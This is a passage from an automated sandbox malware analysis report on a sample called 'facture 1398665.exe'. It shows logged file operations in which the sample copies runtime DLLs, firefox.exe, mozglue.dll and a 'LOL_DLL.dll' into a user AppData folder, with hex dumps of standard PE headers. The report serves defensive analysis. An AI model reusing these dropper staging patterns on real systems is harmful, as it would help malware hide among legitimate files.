C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.list | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpg | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\_isetup | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident and open reparse point | success or wait | 1 | 2E3089 | CreateDirectoryA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\_isetup | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident and open reparse point | object name collision | 1 | 2E2F63 | CreateDirectoryA
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 | read attributes and synchronize and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 2E4383 | CreateFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000 | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident and open reparse point | object name collision | 1 | 2E34A4 | CreateDirectoryA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

File WrittenFile Written

Copyright Joe Security LLC 2018 Page 119 of 149

Page 120: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll

0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll

0 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 120 of 149

Page 121: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll

0 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll

0 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 121 of 149

Page 122: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll

0 21696 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll

0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 122 of 149

Page 123: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dll

0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 bf 99 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll

0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 123 of 149

Page 124: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll

0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll

0 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 124 of 149

Page 125: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll

0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dll

0 20672 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 125 of 149

Page 126: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll

0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll

0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 2E30C7 CopyFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

Copyright Joe Security LLC 2018 Page 126 of 149

Page 127: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll

